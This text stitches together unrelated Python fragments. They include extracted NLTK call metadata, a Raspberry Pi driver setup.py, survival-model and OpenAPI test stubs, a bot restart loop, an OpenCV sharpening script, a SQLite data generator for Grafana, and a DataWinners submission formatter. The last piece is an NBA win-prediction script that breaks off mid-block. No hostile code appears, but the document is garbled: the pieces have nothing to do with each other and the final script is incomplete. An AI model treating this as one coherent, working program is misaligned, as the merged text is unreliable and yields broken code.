(['self._root_label', '[]'], {}), '(self._root_label, [])\n', (40870, 40892), False, 'from nltk import Tree, chunk\n'), ((46347, 46408), 're.match', 're.match', (['"""(?P<nonterminal>(\\\\.|[^:])*)(:(?P<rule>.*))"""', 'line'], {}), "('(?P<nonterminal>(\\\\.|[^:])*)(:(?P<rule>.*))', line)\n", (46355, 46408), False, 'import re\n'), ((50277, 50294), 'nltk.Tree', 'Tree', (['"""S"""', 'tokens'], {}), "('S', tokens)\n", (50281, 50294), False, 'from nltk import Tree, chunk\n'), ((53163, 53219), 'nltk.corpus.conll2000.chunked_sents', 'conll2000.chunked_sents', (['"""test.txt"""'], {'chunk_types': "('NP',)"}), "('test.txt', chunk_types=('NP',))\n", (53186, 53219), False, 'from nltk.corpus import conll2000\n'), ((40998, 41034), 'nltk.Tree', 'Tree', (['self._root_label', 'chunk_struct'], {}), '(self._root_label, chunk_struct)\n', (41002, 41034), False, 'from nltk import Tree, chunk\n'), ((53584, 53619), 'nltk.corpus.conll2000.chunked_sents', 'conll2000.chunked_sents', (['"""test.txt"""'], {}), "('test.txt')\n", (53607, 53619), False, 'from nltk.corpus import conll2000\n'), ((6507, 6537), 'nltk.Tree', 'Tree', (['chunk_label', 'subsequence'], {}), '(chunk_label, subsequence)\n', (6511, 6537), False, 'from nltk import Tree, chunk\n'), ((14389, 14427), 're.match', 're.match', (['"""[^{}]*{[^{}]*}[^{}]*"""', 'rule'], {}), "('[^{}]*{[^{}]*}[^{}]*', rule)\n", (14397, 14427), False, 'import re\n'), ((14466, 14488), 're.split', 're.split', (['"""[{}]"""', 'rule'], {}), "('[{}]', rule)\n", (14474, 14488), False, 'import re\n')]
|
#
# RPi-Spark pHAT Drives
# Author: <NAME>
# 2018.6.6
# 2020.7.18 Fix screenCenter incorrect error
#
from setuptools import setup, find_packages
classifiers = [
'Development Status :: 4 - Beta',
'Operating System :: POSIX :: Linux',
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Software Development',
'Topic :: System :: Hardware',
'Topic :: System :: Hardware :: Hardware Drivers'
]
keywords = (
"development kit"
"oled"
"monochrome greyscale color"
"ssd1306"
"mpu6050"
"attitude shake motion gyroscope accelerometer thermometer sensor"
"spi i2c 128x64"
"key buttons"
"joystick game"
"audio speaker headset headphone earphone"
"pwm tone"
"ogg mp3 wave"
"gpio extended pads"
)
desc = 'The RPi-Spark pHat let you to easily develop interesting applications use the GPIO of Raspberry Pi. It included SSD1306 128x64 OLED, MPU6050 Sensor (Gyroscope, Accelerometer, Thermometer Sensor), 5 ways joystick, 2 push buttons, 3.5mm stereo headphone jack, Speaker and 19 extended GPIO pads'
setup (
name = 'JMRPi.Spark',
version = '1.0.10',
author = '<NAME>',
author_email = '<EMAIL>',
description = desc,
long_description = desc,
platforms = ['Linux'],
license = 'MIT',
classifiers = classifiers,
keywords = keywords,
url = 'https://github.com/mobinrg/rpi_spark_drives',
dependency_links = [],
install_requires = [],
packages = find_packages()
)
|
[
"setuptools.find_packages"
] |
[((1575, 1590), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (1588, 1590), False, 'from setuptools import setup, find_packages\n')]
|
import pytest
from pycox.models import BCESurv
import torchtuples as tt
from utils_model_testing import make_dataset, fit_model, assert_survs
@pytest.mark.parametrize('numpy', [True, False])
@pytest.mark.parametrize('num_durations', [2, 5])
def test_pmf_runs(numpy, num_durations):
data = make_dataset(True)
input, target = data
labtrans = BCESurv.label_transform(num_durations)
target = labtrans.fit_transform(*target)
data = tt.tuplefy(input, target)
if not numpy:
data = data.to_tensor()
net = tt.practical.MLPVanilla(input.shape[1], [4], labtrans.out_features)
model = BCESurv(net)
fit_model(data, model)
assert_survs(input, model)
model.duration_index = labtrans.cuts
assert_survs(input, model)
cdi = model.interpolate(3, 'const_pdf')
assert_survs(input, cdi)
|
[
"torchtuples.practical.MLPVanilla",
"pycox.models.BCESurv",
"utils_model_testing.make_dataset",
"utils_model_testing.fit_model",
"torchtuples.tuplefy",
"utils_model_testing.assert_survs",
"pycox.models.BCESurv.label_transform",
"pytest.mark.parametrize"
] |
[((146, 193), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""numpy"""', '[True, False]'], {}), "('numpy', [True, False])\n", (169, 193), False, 'import pytest\n'), ((195, 243), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""num_durations"""', '[2, 5]'], {}), "('num_durations', [2, 5])\n", (218, 243), False, 'import pytest\n'), ((296, 314), 'utils_model_testing.make_dataset', 'make_dataset', (['(True)'], {}), '(True)\n', (308, 314), False, 'from utils_model_testing import make_dataset, fit_model, assert_survs\n'), ((355, 393), 'pycox.models.BCESurv.label_transform', 'BCESurv.label_transform', (['num_durations'], {}), '(num_durations)\n', (378, 393), False, 'from pycox.models import BCESurv\n'), ((450, 475), 'torchtuples.tuplefy', 'tt.tuplefy', (['input', 'target'], {}), '(input, target)\n', (460, 475), True, 'import torchtuples as tt\n'), ((536, 603), 'torchtuples.practical.MLPVanilla', 'tt.practical.MLPVanilla', (['input.shape[1]', '[4]', 'labtrans.out_features'], {}), '(input.shape[1], [4], labtrans.out_features)\n', (559, 603), True, 'import torchtuples as tt\n'), ((616, 628), 'pycox.models.BCESurv', 'BCESurv', (['net'], {}), '(net)\n', (623, 628), False, 'from pycox.models import BCESurv\n'), ((633, 655), 'utils_model_testing.fit_model', 'fit_model', (['data', 'model'], {}), '(data, model)\n', (642, 655), False, 'from utils_model_testing import make_dataset, fit_model, assert_survs\n'), ((660, 686), 'utils_model_testing.assert_survs', 'assert_survs', (['input', 'model'], {}), '(input, model)\n', (672, 686), False, 'from utils_model_testing import make_dataset, fit_model, assert_survs\n'), ((732, 758), 'utils_model_testing.assert_survs', 'assert_survs', (['input', 'model'], {}), '(input, model)\n', (744, 758), False, 'from utils_model_testing import make_dataset, fit_model, assert_survs\n'), ((807, 831), 'utils_model_testing.assert_survs', 'assert_survs', (['input', 'cdi'], {}), '(input, cdi)\n', (819, 831), False, 'from utils_model_testing import make_dataset, fit_model, assert_survs\n')]
|
# coding: utf-8
"""
App::Netdisco
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 2.050003
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import openapi_netdisco
from openapi_netdisco.api.general_api import GeneralApi # noqa: E501
from openapi_netdisco.rest import ApiException
class TestGeneralApi(unittest.TestCase):
"""GeneralApi unit test stubs"""
def setUp(self):
self.api = openapi_netdisco.api.general_api.GeneralApi() # noqa: E501
def tearDown(self):
pass
def test_login_post(self):
"""Test case for login_post
"""
pass
def test_logout_get(self):
"""Test case for logout_get
"""
pass
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"openapi_netdisco.api.general_api.GeneralApi"
] |
[((909, 924), 'unittest.main', 'unittest.main', ([], {}), '()\n', (922, 924), False, 'import unittest\n'), ((590, 635), 'openapi_netdisco.api.general_api.GeneralApi', 'openapi_netdisco.api.general_api.GeneralApi', ([], {}), '()\n', (633, 635), False, 'import openapi_netdisco\n')]
|
import time
import os
import asyncio
from conf import debug
while True:
if debug:
n = 0
else:
n = 5
os.system("python3 C:\\Users\\qvalador\\Documents\\Code\\scout\\bot.py")
print("the bot died, restarting in 5")
time.sleep(n)
|
[
"os.system",
"time.sleep"
] |
[((129, 201), 'os.system', 'os.system', (['"""python3 C:\\\\Users\\\\qvalador\\\\Documents\\\\Code\\\\scout\\\\bot.py"""'], {}), "('python3 C:\\\\Users\\\\qvalador\\\\Documents\\\\Code\\\\scout\\\\bot.py')\n", (138, 201), False, 'import os\n'), ((249, 262), 'time.sleep', 'time.sleep', (['n'], {}), '(n)\n', (259, 262), False, 'import time\n')]
|
# Copyright 2018 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run prepare phase."""
import argparse
import logging
import sys
import zaza.controller
import zaza.model
import zaza.charm_lifecycle.utils as utils
import zaza.utilities.cli as cli_utils
import zaza.utilities.run_report as run_report
import zaza.utilities.deployment_env as deployment_env
@run_report.register_event_wrapper('Prepare Environment')
def prepare(model_name):
"""Run all steps to prepare the environment before a functional test run.
:param model: Name of model to add
:type bundle: str
"""
zaza.controller.add_model(
model_name,
config=deployment_env.get_model_settings(),
region=deployment_env.get_cloud_region())
zaza.model.set_model_constraints(
model_name=model_name,
constraints=deployment_env.get_model_constraints())
def parse_args(args):
"""Parse command line arguments.
:param args: List of configure functions functions
:type list: [str1, str2,...] List of command line arguments
:returns: Parsed arguments
:rtype: Namespace
"""
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--model-name', help='Name of model to add')
parser.add_argument('--log', dest='loglevel',
help='Loglevel [DEBUG|INFO|WARN|ERROR|CRITICAL]')
parser.set_defaults(loglevel='INFO')
parser.set_defaults(model_name=utils.generate_model_name())
return parser.parse_args(args)
def main():
"""Add a new model."""
args = parse_args(sys.argv[1:])
cli_utils.setup_logging(log_level=args.loglevel.upper())
logging.info('model_name: {}'.format(args.model_name))
prepare(args.model_name)
run_report.output_event_report()
|
[
"zaza.charm_lifecycle.utils.generate_model_name",
"zaza.utilities.run_report.output_event_report",
"argparse.ArgumentParser",
"zaza.utilities.run_report.register_event_wrapper",
"zaza.utilities.deployment_env.get_model_constraints",
"zaza.utilities.deployment_env.get_model_settings",
"zaza.utilities.deployment_env.get_cloud_region"
] |
[((876, 932), 'zaza.utilities.run_report.register_event_wrapper', 'run_report.register_event_wrapper', (['"""Prepare Environment"""'], {}), "('Prepare Environment')\n", (909, 932), True, 'import zaza.utilities.run_report as run_report\n'), ((1643, 1668), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1666, 1668), False, 'import argparse\n'), ((2238, 2270), 'zaza.utilities.run_report.output_event_report', 'run_report.output_event_report', ([], {}), '()\n', (2268, 2270), True, 'import zaza.utilities.run_report as run_report\n'), ((1172, 1207), 'zaza.utilities.deployment_env.get_model_settings', 'deployment_env.get_model_settings', ([], {}), '()\n', (1205, 1207), True, 'import zaza.utilities.deployment_env as deployment_env\n'), ((1224, 1257), 'zaza.utilities.deployment_env.get_cloud_region', 'deployment_env.get_cloud_region', ([], {}), '()\n', (1255, 1257), True, 'import zaza.utilities.deployment_env as deployment_env\n'), ((1348, 1386), 'zaza.utilities.deployment_env.get_model_constraints', 'deployment_env.get_model_constraints', ([], {}), '()\n', (1384, 1386), True, 'import zaza.utilities.deployment_env as deployment_env\n'), ((1944, 1971), 'zaza.charm_lifecycle.utils.generate_model_name', 'utils.generate_model_name', ([], {}), '()\n', (1969, 1971), True, 'import zaza.charm_lifecycle.utils as utils\n')]
|
#!/usr/bin/env python
# _*_ coding:utf-8 _*_
import cv2 as cv
import numpy as np
def sharpen(image):
kernel = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]], np.float32) #銳化
dst = cv.filter2D(image, -1, kernel=kernel)
cv.imwrite("output00000000_sharpen.png",dst)
for i in range(1):
for j in range(1):
src = cv.imread("./m/png/m9/output00000000.png")
sharpen(src)
|
[
"cv2.imwrite",
"numpy.array",
"cv2.imread",
"cv2.filter2D"
] |
[((114, 173), 'numpy.array', 'np.array', (['[[0, -1, 0], [-1, 5, -1], [0, -1, 0]]', 'np.float32'], {}), '([[0, -1, 0], [-1, 5, -1], [0, -1, 0]], np.float32)\n', (122, 173), True, 'import numpy as np\n'), ((188, 225), 'cv2.filter2D', 'cv.filter2D', (['image', '(-1)'], {'kernel': 'kernel'}), '(image, -1, kernel=kernel)\n', (199, 225), True, 'import cv2 as cv\n'), ((233, 278), 'cv2.imwrite', 'cv.imwrite', (['"""output00000000_sharpen.png"""', 'dst'], {}), "('output00000000_sharpen.png', dst)\n", (243, 278), True, 'import cv2 as cv\n'), ((334, 376), 'cv2.imread', 'cv.imread', (['"""./m/png/m9/output00000000.png"""'], {}), "('./m/png/m9/output00000000.png')\n", (343, 376), True, 'import cv2 as cv\n')]
|
"""Update a SQLite database in real time. Requires Grafana and Python >3.6.
```
python -m pip install numpy tqdm
python create_grafana_sample_db.py
```
See discussion context: https://github.com/fr-ser/grafana-sqlite-datasource/issues/21
"""
import sqlite3
import time
from contextlib import ContextDecorator
from pathlib import Path
import numpy as np
from tqdm import tqdm
class SQLConnection(ContextDecorator):
"""Ensure the SQLite connection is properly opened and closed."""
def __init__(self, path_db: Path) -> None:
"""Initialize context wrapper.
Args:
path_db: Path to a SQLite file
"""
self.conn = None
self.path_db = path_db
def __enter__(self) -> sqlite3.Connection:
"""Connect to the database and return connection reference.
Returns:
Connection: connection to sqlite database
"""
self.conn = sqlite3.connect(self.path_db)
return self.conn
def __exit__(self, exc_type, exc_value, traceback) -> None:
"""Close connection.""" # noqa: DAR101
self.conn.close()
def generate_fake_db(path_db: Path) -> None:
"""Populate a SQL database in real time to test real time chart visualization.
Args:
path_db: path to SQLite file
"""
print(f'Creating: {path_db}') # noqa: T001
with SQLConnection(path_db) as conn:
cursor = conn.cursor()
cursor.execute('DROP TABLE IF EXISTS test_data;')
conn.commit()
cursor.execute("""CREATE TABLE test_data (
time FLOAT NOT NULL,
temp FLOAT NOT NULL,
min FLOAT NOT NULL,
max FLOAT NOT NULL
);""")
conn.commit()
while True:
# Generate random data points and add to the database
points = 1000
mu, sigma = (10, 8) # mean and standard deviation
samples = np.random.normal(mu, sigma, points)
for idx in tqdm(range(points)):
values = f'{time.time()}, {samples[idx]}, {samples[idx] - 2.1}, {samples[idx] + 3.2}'
cursor.execute(f'INSERT INTO test_data (time, temp, min, max) VALUES ({values});') # noqa: S608, Q440
conn.commit()
time.sleep(1)
if __name__ == '__main__':
generate_fake_db(path_db=Path(__file__).resolve().parent / 'test_db.sqlite')
|
[
"time.time",
"time.sleep",
"pathlib.Path",
"sqlite3.connect",
"numpy.random.normal"
] |
[((926, 955), 'sqlite3.connect', 'sqlite3.connect', (['self.path_db'], {}), '(self.path_db)\n', (941, 955), False, 'import sqlite3\n'), ((1949, 1984), 'numpy.random.normal', 'np.random.normal', (['mu', 'sigma', 'points'], {}), '(mu, sigma, points)\n', (1965, 1984), True, 'import numpy as np\n'), ((2296, 2309), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (2306, 2309), False, 'import time\n'), ((2057, 2068), 'time.time', 'time.time', ([], {}), '()\n', (2066, 2068), False, 'import time\n'), ((2368, 2382), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (2372, 2382), False, 'from pathlib import Path\n')]
|
import pandas as pd
import click
def condense(ann_path, out_path, segment_length):
df = pd.read_csv(ann_path)
df = df.sort_values(by=['video_id', 'start_seconds'])
if not 'label' in df.columns:
df['label'] = df['labeler_2']
df.loc[df['label'] == 'none', 'label'] = 'background'
df.loc[df['labeler_2'].isnull(), 'label'] = df['labeler_1']
df.loc[~df['labeler_3'].isnull(), 'label'] = df['labeler_3']
print("Number of records before dedupe: %d" % len(df))
df.drop_duplicates(subset=["video_id", "start_seconds", "end_seconds"],
keep='first', inplace=True)
print("Number of records after dedupe: %d" % len(df))
parent_starts = []
parent_ends = []
durations = []
end = False
index = 0
while not end:
row = df.iloc[index]
parent_start = row['start_seconds']
next_row_index = index + 1
last_start = row['start_seconds']
last_duration = row['duration']
while next_row_index < len(df) and df.iloc[next_row_index]['start_seconds'] == last_start + last_duration and \
df.iloc[next_row_index]['label'] == row['label']:
last_start = df.iloc[next_row_index]['start_seconds']
last_duration = df.iloc[next_row_index]['duration']
tmp = df.iloc[next_row_index]
if tmp['video_id'] == 'CfFrwiwgniU':
if tmp['start_seconds'] == 336.0 or tmp['start_seconds'] == 337.0:
print(tmp)
next_row_index += 1
last_row = df.iloc[next_row_index - 1]
parent_end = last_row['end_seconds']
for i in range(index, next_row_index):
parent_starts.append(parent_start)
parent_ends.append(parent_end)
durations.append(parent_end - parent_start)
index = next_row_index
if index >= len(df):
end = True
df['parent_start'] = parent_starts
df['parent_end'] = parent_ends
df['duration'] = durations
df.drop_duplicates(subset=["video_id", "parent_start", "parent_end", "label"], keep='first', inplace=True)
df = df.drop(['start_seconds', 'end_seconds'], axis=1)
df = df.drop(['start_frame', 'end_frame'], axis=1)
df.rename(columns={'parent_start': 'start_seconds'}, inplace=True)
df.rename(columns={'parent_end': 'end_seconds'}, inplace=True)
df = df.loc[:, ~df.columns.str.contains('^Unnamed')]
df = df.reset_index()
df = df.drop(['index'], axis=1)
df.to_csv(out_path)
@click.command()
@click.option('--ann-path', default='../annotations/v0.5.0-anns-5sec.csv')
@click.option('--out-path', default='../annotations/v0.5.0-anns.csv')
@click.option('--segment-length', default=5)
def start(ann_path, out_path, segment_length):
condense(ann_path, out_path, segment_length)
if __name__ == '__main__':
start()
|
[
"pandas.read_csv",
"click.option",
"click.command"
] |
[((2535, 2550), 'click.command', 'click.command', ([], {}), '()\n', (2548, 2550), False, 'import click\n'), ((2552, 2625), 'click.option', 'click.option', (['"""--ann-path"""'], {'default': '"""../annotations/v0.5.0-anns-5sec.csv"""'}), "('--ann-path', default='../annotations/v0.5.0-anns-5sec.csv')\n", (2564, 2625), False, 'import click\n'), ((2627, 2695), 'click.option', 'click.option', (['"""--out-path"""'], {'default': '"""../annotations/v0.5.0-anns.csv"""'}), "('--out-path', default='../annotations/v0.5.0-anns.csv')\n", (2639, 2695), False, 'import click\n'), ((2697, 2740), 'click.option', 'click.option', (['"""--segment-length"""'], {'default': '(5)'}), "('--segment-length', default=5)\n", (2709, 2740), False, 'import click\n'), ((93, 114), 'pandas.read_csv', 'pd.read_csv', (['ann_path'], {}), '(ann_path)\n', (104, 114), True, 'import pandas as pd\n')]
|
import json
import datetime
from django.utils.translation import ugettext, get_language
import elasticutils
from datawinners.accountmanagement.localized_time import convert_utc_to_localized
from datawinners.search.filters import SubmissionDateRangeFilter, DateQuestionRangeFilter
from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name
from datawinners.search.submission_headers import HeaderFactory
from datawinners.search.submission_index_constants import SubmissionIndexConstants
from datawinners.settings import ELASTIC_SEARCH_URL, ELASTIC_SEARCH_TIMEOUT
from datawinners.search.query import QueryBuilder, Query
from mangrove.form_model.field import FieldSet, SelectField, MediaField
from mangrove.form_model.form_model import get_field_by_attribute_value
from mangrove.utils.dates import py_datetime_to_js_datestring
class SubmissionQueryResponseCreator(object):
def __init__(self, form_model, localized_time_delta, use_iso_create_date=False):
self.form_model = form_model
self.localized_time_delta = localized_time_delta
self.use_iso_create_date = use_iso_create_date
def combine_name_and_id(self, short_code, entity_name, submission):
return submission.append(
["%s<span class='small_grey'> %s</span>" % (
entity_name, short_code)]) if entity_name else submission.append(entity_name)
def get_field_set_fields(self, fields, parent_field_code=None):
field_set_field_dict = {}
for field in fields:
if isinstance(field, FieldSet):
field_set_field_dict.update(
{es_questionnaire_field_name(field.code, self.form_model.id, parent_field_code): field})
group_field_code = field.code if field.is_group() else None
field_set_field_dict.update(self.get_field_set_fields(field.fields, group_field_code))
return field_set_field_dict
def _populate_datasender(self, res, submission):
if res.get(SubmissionIndexConstants.DATASENDER_ID_KEY) == u'N/A':
submission.append(res.get(SubmissionIndexConstants.DATASENDER_NAME_KEY))
else:
self.combine_name_and_id(res.get(SubmissionIndexConstants.DATASENDER_ID_KEY),
res.get(SubmissionIndexConstants.DATASENDER_NAME_KEY), submission)
def _populate_error_message(self, key, language, res, submission):
error_msg = res.get(key)
if error_msg.find('| |') != -1:
error_msg = error_msg.split('| |,')[['en', 'fr'].index(language)]
submission.append(error_msg)
def _convert_to_localized_date_time(self, key, res, submission):
submission_date_time = datetime.datetime.strptime(res.get(key), "%b. %d, %Y, %I:%M %p")
datetime_local = convert_utc_to_localized(self.localized_time_delta, submission_date_time)
submission.append(datetime_local.strftime("%b. %d, %Y, %H:%M"))
def _convert_to_iso_format_date_time(self, key, res, submission):
submission_date_time = datetime.datetime.strptime(res.get(key), "%b. %d, %Y, %I:%M %p")
js_date_time = py_datetime_to_js_datestring(submission_date_time)
submission.append(js_date_time)
def _get_media_field_codes(self):
return [es_questionnaire_field_name(field.code, self.form_model.id, field.parent_field_code) for
field in
self.form_model.media_fields] if self.form_model.is_media_type_fields_present else []
def create_response(self, required_field_names, search_results):
entity_question_codes = [es_questionnaire_field_name(field.code, self.form_model.id) for field in
self.form_model.entity_questions]
fieldset_fields = self.get_field_set_fields(self.form_model.fields)
meta_fields = [SubmissionIndexConstants.DATASENDER_ID_KEY]
meta_fields.extend([es_unique_id_code_field_name(code) for code in entity_question_codes])
media_field_codes = self._get_media_field_codes()
submissions = []
language = get_language()
for res in search_results.hits:
submission = [res._meta.id]
for key in required_field_names:
if not key in meta_fields:
if key in entity_question_codes:
self.combine_name_and_id(short_code=res.get(es_unique_id_code_field_name(key)),
entity_name=res.get(key), submission=submission)
elif key == SubmissionIndexConstants.DATASENDER_NAME_KEY:
self._populate_datasender(res, submission)
elif key == 'status' and res.get(key):
submission.append(ugettext(res.get(key)))
elif key == SubmissionIndexConstants.SUBMISSION_DATE_KEY or key == SubmissionIndexConstants.SUBMISSION_UPDATED_KEY:
self._convert_to_iso_format_date_time(key, res, submission) if self.use_iso_create_date else\
self._convert_to_localized_date_time(key, res, submission)
elif key == 'error_msg':
self._populate_error_message(key, language, res, submission)
elif key in fieldset_fields.keys():
submission.append(
_format_fieldset_values_for_representation(res.get(key), fieldset_fields.get(key),
res._meta.id))
else:
submission.append(self._append_if_attachments_are_present(res, key, media_field_codes))
submissions.append(submission)
return submissions
def _append_if_attachments_are_present(self, res, key, media_field_codes):
if self.form_model.is_media_type_fields_present and key in media_field_codes:
return _format_media_value(res._meta.id, res.get(key))
else:
return res.get(ugettext(key))
def _format_media_value(submission_id, value):
if value:
return "<a href='/download/attachment/%s/%s'>%s</a>" % (submission_id, value, value)
def _format_values(field_set, formatted_value, value_list, submission_id):
if not value_list:
return ''
value_dict = value_list[0]
for i, field in enumerate(field_set.fields):
if isinstance(field, SelectField):
choices = value_dict.get(field.code)
if choices:
if field.is_single_select:
value = choices
else:
value = '(' + ', '.join(choices) + ')' if len(choices) > 1 else ', '.join(choices)
else:
value = ''
elif isinstance(field, FieldSet):
value = ''
value = _format_values(field, value, value_dict.get(field.code), submission_id)
elif isinstance(field, MediaField):
value = _format_media_value(submission_id, value_dict.get(field.code))
value = '' if not value else value
else:
value = value_dict.get(field.code) or ''
formatted_value += '"' + '<span class="repeat_qtn_label">' + field.label + '</span>' + ': ' + value + '"'
formatted_value += ';' if i == len(field_set.fields) - 1 else ', '
return formatted_value
def _format_fieldset_values_for_representation(entry, field_set, submission_id):
formatted_value = ''
if entry:
for value_dict in json.loads(entry):
formatted_value = _format_values(field_set, formatted_value, [value_dict], submission_id)
formatted_value += '<br><br>'
return '<span class="repeat_ans">' + formatted_value + '</span>'
|
[
"json.loads",
"datawinners.search.index_utils.es_unique_id_code_field_name",
"django.utils.translation.get_language",
"datawinners.search.index_utils.es_questionnaire_field_name",
"mangrove.utils.dates.py_datetime_to_js_datestring",
"django.utils.translation.ugettext",
"datawinners.accountmanagement.localized_time.convert_utc_to_localized"
] |
[((2827, 2900), 'datawinners.accountmanagement.localized_time.convert_utc_to_localized', 'convert_utc_to_localized', (['self.localized_time_delta', 'submission_date_time'], {}), '(self.localized_time_delta, submission_date_time)\n', (2851, 2900), False, 'from datawinners.accountmanagement.localized_time import convert_utc_to_localized\n'), ((3163, 3213), 'mangrove.utils.dates.py_datetime_to_js_datestring', 'py_datetime_to_js_datestring', (['submission_date_time'], {}), '(submission_date_time)\n', (3191, 3213), False, 'from mangrove.utils.dates import py_datetime_to_js_datestring\n'), ((4113, 4127), 'django.utils.translation.get_language', 'get_language', ([], {}), '()\n', (4125, 4127), False, 'from django.utils.translation import ugettext, get_language\n'), ((7566, 7583), 'json.loads', 'json.loads', (['entry'], {}), '(entry)\n', (7576, 7583), False, 'import json\n'), ((3628, 3687), 'datawinners.search.index_utils.es_questionnaire_field_name', 'es_questionnaire_field_name', (['field.code', 'self.form_model.id'], {}), '(field.code, self.form_model.id)\n', (3655, 3687), False, 'from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name\n'), ((3309, 3398), 'datawinners.search.index_utils.es_questionnaire_field_name', 'es_questionnaire_field_name', (['field.code', 'self.form_model.id', 'field.parent_field_code'], {}), '(field.code, self.form_model.id, field.\n parent_field_code)\n', (3336, 3398), False, 'from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name\n'), ((3939, 3973), 'datawinners.search.index_utils.es_unique_id_code_field_name', 'es_unique_id_code_field_name', (['code'], {}), '(code)\n', (3967, 3973), False, 'from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name\n'), ((6070, 6083), 'django.utils.translation.ugettext', 'ugettext', (['key'], {}), '(key)\n', (6078, 6083), False, 'from django.utils.translation import ugettext, get_language\n'), ((1652, 1730), 'datawinners.search.index_utils.es_questionnaire_field_name', 'es_questionnaire_field_name', (['field.code', 'self.form_model.id', 'parent_field_code'], {}), '(field.code, self.form_model.id, parent_field_code)\n', (1679, 1730), False, 'from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name\n'), ((4417, 4450), 'datawinners.search.index_utils.es_unique_id_code_field_name', 'es_unique_id_code_field_name', (['key'], {}), '(key)\n', (4445, 4450), False, 'from datawinners.search.index_utils import es_unique_id_code_field_name, es_questionnaire_field_name\n')]
|
from math import sqrt
class BadClass:
def __init__(self, x: int, y: int):
self.x = x
self.y = y
@staticmethod
def length(x: int, y: int) -> float:
return sqrt(x ** 2 + y ** 2)
@staticmethod
def dot(self_x: int, self_y: int, other_x: int, other_y: int) -> int:
return self_x * other_x + self_y * other_y
class GoodClass(object):
def __init__(self, x: int, y: int):
self.x = x
self.y = y
@property
def length(self) -> float:
return sqrt(self.dot(self.x, self.y))
def dot(self, other_x: int, other_y: int) -> int:
return self.x * other_x + self.y * other_y
|
[
"math.sqrt"
] |
[((193, 214), 'math.sqrt', 'sqrt', (['(x ** 2 + y ** 2)'], {}), '(x ** 2 + y ** 2)\n', (197, 214), False, 'from math import sqrt\n')]
|
#!/usr/bin/env python
# flake8: noqa
# Para pruebas rápidas
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'src.config.settings.local')
import django
django.setup()
##############################################################################
|
[
"os.environ.setdefault",
"django.setup"
] |
[((72, 148), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""src.config.settings.local"""'], {}), "('DJANGO_SETTINGS_MODULE', 'src.config.settings.local')\n", (93, 148), False, 'import os\n'), ((164, 178), 'django.setup', 'django.setup', ([], {}), '()\n', (176, 178), False, 'import django\n')]
|
import os
import pickle
import pandas as pd
import sys
import cmd
#season = input("What NBA season would you like to select? Enter between 2001-2016. ")
#season = int(season)
#player_list = input("Enter 5 players from that season in a format like this... '<NAME>','<NAME>'...")
#player_list = player_list.split(',')
#print(player_list)
player_list = sys.argv[1].split(',')
season = int(sys.argv[2])
# player_list = ("<NAME>","<NAME>","<NAME>","<NAME>","<NAME>")
# season = 2015
path = os.getcwd() #get working directory
player_data = pd.read_csv(path + '/data/player_data.csv') #get data
player_data_sr= pd.read_csv(path + '/data/player_data_single_record.csv')
season_average_data = pd.read_csv(path + '/data/season_average_data.csv', index_col=0)
salary_data = pd.read_csv(path + '/data/salaries_2017.csv')
pd_sr = player_data_sr[player_data_sr['season']==season]
sa_data = season_average_data[season_average_data['season']==season]
import functions.predictWinPercentage as predictWinPercentage #import function
import functions.playerSwap as playerSwap
#Get prediction
prediction = predictWinPercentage.predictWinPercentage(player_data_sr, season_average_data, player_list, season)
#A note on salary cap
if season == 2017:
salary_result = playerSwap.salaryCap(player_list, salary_data, .8)
if salary_result['over_cap'] == True:
comment = 'The total salary of your team is ' + str(salary_result['total_salary']) + 'M. That is higher than 80 percent of the salary cap' + \
' so this team might be unrealistic... but this is just for fun! This dream team\'s ' + prediction
print(comment)
else:
print(prediction)
else:
print(prediction)
#Ask the user if more information about team is desired
response = input("Would you like to know the strengths and weaknesses of your team? Respond 'yes' or 'no'! ")
if response == 'yes':
z_score = playerSwap.getZScores(player_list, pd_sr, sa_data)
result = playerSwap.teamAssessment(z_score)
print(result['weaknesses'])
print(result['strengths'])
response = input("Would you like me to make a recommendation on a player to add to your team? Respond 'yes' or 'no'! ")
if response == 'yes' and season == 2017:
response2 = input("Should we consider the salary cap in order to give a realistic player swap? Respond 'yes' or 'no'! ")
if response2 == 'yes':
potential_swaps = playerSwap.assessPlayerSwaps(player_list, pd_sr, sa_data, salary_data, True)
result = playerSwap.recommendPlayer(player_list, potential_swaps)
else:
potential_swaps = playerSwap.assessPlayerSwaps(player_list, pd_sr, sa_data, salary_data, False)
result = playerSwap.recommendPlayer(player_list, potential_swaps)
print(result)
response3 = input("Do you want to know the new predicted win percentage with this swap? Respond 'yes' or 'no'! ")
if response3 == 'yes':
new_player_list = playerSwap.recommendPlayer(player_list, potential_swaps, return_new_team_list=True)
prediction = predictWinPercentage.predictWinPercentage(pd_sr, sa_data, new_player_list, season)
print(prediction)
elif response == 'yes':
potential_swaps = playerSwap.assessPlayerSwaps(player_list, pd_sr, sa_data, salary_data, True)
result = playerSwap.recommendPlayer(player_list, potential_swaps)
print(result)
response3 = input("Do you want to know the new predicted win percentage with this swap? Respond 'yes' or 'no'! ")
if response3 == 'yes':
